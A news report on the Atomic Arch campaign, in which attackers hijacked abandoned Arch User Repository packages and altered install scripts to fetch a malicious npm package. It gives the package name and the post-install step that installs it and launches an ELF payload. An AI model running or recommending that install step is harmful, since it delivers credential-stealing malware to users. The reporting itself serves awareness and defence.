Rust-powered malware hits 1,500 Arch Linux packages in Atomic Arch campaign

The real problem in Atomic Arch was not that the malware was written in Rust. It was that attackers turned abandoned Arch User Repository packages into a supply-chain trap, then used package maintenance itself as the delivery channel for credential theft and data exfiltration.

Sonatype identified the campaign and said the first wave surfaced on June 11, 2026, when attackers took over legitimate but orphaned AUR projects and altered PKGBUILDs to pull in a malicious npm dependency during installation. On June 12, a second wave added Bun-based installation paths, widening the blast radius beyond the original npm-driven payload. Sonatype tracked the activity as Sonatype-2026-003775 and gave it a CVSS score of 8.7.

The malicious dependency at the center of the first wave was atomic-lockfile. Sonatype said analysis linked it to Linux payload behavior associated with credential harvesting, stealth, anti-debugging, and possible exfiltration. Community maintainers on the Arch mailing lists described the same pattern repeating across packages: a post_install script would invoke npm install atomic-lockfile and then launch an ELF payload. That made the compromise harder to spot than a straight source-code swap, because the package contents could look ordinary while the install step did the damage.

Arch Linux publicly acknowledged the incident on June 12, saying it was seeing a high volume of malicious package adoptions and updates in the AUR. The project warned users that they might run into issues creating new AUR accounts, pushing package updates, or adopting and creating packages while the response continued. Arch staff also told users of AUR packages to review PKGBUILD and install script changes carefully and to report suspicious commits on the aur-general mailing list.

The scale was striking. Arch’s package index lists 114,708 packages in the AUR, and Sonatype said the campaign may affect roughly 1,500 of them across multiple waves. Community analysis pushed that number even higher, with some reports placing the campaign at 1,619 unique AUR package names. Even at the lower figure, this was not a tiny corner-case compromise. It was a direct hit on the trust model that makes the AUR usable in the first place.

Arch later said it was actively working to track down existing malicious commits and prevent new ones from being pushed. That is the lesson Atomic Arch leaves behind: on Arch-based systems, the risk is not just what a package says it is, but what its build and install scripts can be turned into after an abandoned repo changes hands.